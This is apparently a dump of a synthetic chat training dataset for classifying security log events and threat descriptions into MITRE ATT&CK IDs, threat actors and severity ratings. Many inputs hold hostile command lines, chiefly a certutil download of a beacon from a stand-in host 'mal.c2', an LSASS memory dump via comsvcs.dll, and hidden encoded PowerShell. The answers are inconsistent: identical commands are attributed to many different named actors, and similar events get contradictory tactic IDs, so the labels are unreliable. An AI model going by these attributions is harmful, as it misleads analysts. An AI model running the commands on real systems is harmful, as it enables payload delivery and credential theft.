messages
listlengths
2
2
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.39.126.49", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0002\"], \"technique...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: LOLBin, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Scattered ...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1132.001\", \"T1132\"]}", "role": ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: RobbinHood will search for an RSA encryption key and then perform its encryption process on the system files.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1486\"]}", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confid...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor for newly constructed files that may leverage Microsoft Office-based applications for persistence between startups.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1137\"]}", "r...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.33.93.218", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: LOLBin, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"c...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Zeus Panda queries the system's keyboard mapping to determine the language used on the system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1614\", \"T1614.001\"]}", "ro...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: JA3 Spoof, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"confidence\":...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-GBIH3DPSJF)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Exfiltration, Execution", "role": "user" }, { "content": "{\"severit...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.102.212.38", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Sowbug identified and extracted all Word documents on a server by using a command containing * .doc and *.docx.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}",...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.160.144.180", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0003\"], \"technique...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: Adversaries may use traffic duplication in conjunction with Network Sniffing, Input Capture, or Adversary-in-the-Middle depending on the goals and objectives of the adversary.", "role": "user" }, { "conte...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2444 C:\\temp\\lsass.dmp full\nEvasion Methods: Base64, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confide...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Update software regularly by employing patch management for internal enterprise endpoints and servers.", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0005\", \"TA0008\"], \"techniques\": [\"T1210\", \"T121...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1907 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.125.100.3", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0009\", \"TA0008\"], \"techn...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: objectClass=trustedDomain", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1482\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credent...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-NRIDL1F2UO)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Initial Access, Credential Access, Collection", "role": "user" }, { "con...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (IAM-ROLE-CZFSZSSRQ5)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Persistence, Collection, Impact", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-8ERIAEV90Z)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Persistence", "role": "user" }, { "content": "{\"severity\": \"Critica...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: PLEAD has been executed via malicious links in e-mails.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1204\", \"T1204.001\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-P2TPEV0U3L)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Command and Control, Privilege Escalation, Reconnaissance", "role": "user...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-66HTUPN3ST)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Lateral Movement", "role": "user" }, { "content": "{\"severity\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"c...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, TLS, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: TLS, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (DB-ORACLE-5MK93VIBXN)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Execution, Persistence", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: TLS, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"con...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidenc...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 1414 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.128.87.41", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"],...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: BLINDINGCAN has uploaded files from victim machines.", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"techniques\": [\"T1005\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-8FFEG59LQW)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Collection", "role": "user" }, { "content": "{\"severity\": \"C...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2657 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.134.66.244", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 1322 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.186.129.227", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1860 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.100.107.234", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\", \"TA000...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems.", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\"], \"techniques\": [\"T1566\"]...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1566 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confiden...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.85.29.164", "role": "user" }, { "content": "{\"tactics\": [\"TA0009...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: BlackEnergy has searched for given file types.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1083\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 3434 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.1.138.20", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0008\"], \"techniques\": [\...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: BRONZE BUTLER has used schtasks to register a scheduled task to execute malware during lateral movement.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0003\", \"TA0004\"], \"techniques\": [\"T1053.005\", ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 1943 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.72.34.62", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0006\"], \...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 2945 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.147.216.85", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\",...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"]...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.36.192.7", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\"], \"te...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-BFLYNF2KC4)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Impact, Exfiltration", "role": "user" }, { "content": "{\"severi...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (APP-WEB-AEYSAD62EZ)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Exfiltration", "role": "user" }, { "content": "{\"seve...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2052 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Base64, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confid...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor specifically for events related to snapshots and rollbacks and VM configuration changes, that are occurring outside of normal activity.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"te...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: In Kubernetes environments, processes running inside a container communicate with the Kubernetes API server using service account tokens.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"te...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3505 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.124.50.189", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA004...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-JV76U4BQ90)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Command and Control, Exfiltration, Privilege Escalation", "role": "user"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: ServHelper can execute shell commands against cmd.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.135.186.169", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\", \"TA0002\", \"TA00...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Fileless, TLS", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confi...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Fileless, JA3 Spoof, TLS", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-KTC34XGFCE)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Privilege Escalation", "role": "user" }, { "content":...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.", "role": "user" }, { "content": "{\"tactics\": ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Monitor newly constructed services that abuse control manager to execute malicious commands or payloads.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1569.002\", \"T1569\"]}...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-6I1332K1TB)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Discovery, Collection", "role": "user" }, { "content": "{\"severi...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confid...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3741 C:\\temp\\lsass.dmp full\nEvasion Methods: LOLBin, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"c...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3114 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.30.169.170", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, LOLBin, TLS", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"con...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFu...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target.", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\"], \"techniques\": [\"T1498\", \...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.74.32.177", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1059...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 1393 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.94.95.66", "role": "user" }, { "content": "{\"tactics\": [\"TA000...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.182.6.52", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T1098...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Fileless, JA3 Spoof, Base64", "role": "user" }, { "content": "{\"actor\": \"UNC4841\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 1607 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confide...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.123.117.35", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0009\...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.29.43.246", "role": "user" }, { "content": "{\"tactics\": [\...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: The LNK file is moved to the startup directory", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1547.009\", \"T1547\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Axiom has acquired dynamic DNS services for use in the targeting of intended victims.", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \"techniques\": [\"T1583\", \"T1583.002\"]}", "role": "ass...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-ZONJJPBRB2)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Persistence, Exfiltration", "role": "user" }, { "content": "{\"severi...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.009\", \"T1546\"]}", "role": "assistant" } ]
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: rundll32.exe comsvcs.dll, MiniDump 2441 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.193.109.18", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: rundll32.exe comsvcs.dll, MiniDump 512 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.96.236.55", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0004\", \"TA0011\"], \"techniq...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-168CSIROFS)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Discovery", "role": "user" }, { "content"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: WMI, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\": \"Hi...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Also monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"techniques\": [\"T1011.001\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 2362 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.191.74.125", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0003\"], \"techniques\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: TLS, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confiden...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: SodaMaster has the ability to download additional payloads from C2 to the targeted system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: TeamTNT has searched for unsecured SSH keys.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1552.004\", \"T1552\"]}", "role": "assistant" } ]
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Attor has manipulated the time of last access to files and registry keys after they have been created or modified.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T10...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: SUNBURST used VBScripts to initiate the execution of payloads.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.005\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 1633 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.180.248.199", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA0003\"], \"techniqu...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.135.136.185", "role": "user" }, { "content": "{\"tactics\": [\"TA0040\", \"TA000...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Fileless, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"confidenc...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.34.47.237", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T148...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0005\"], \"te...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"confide...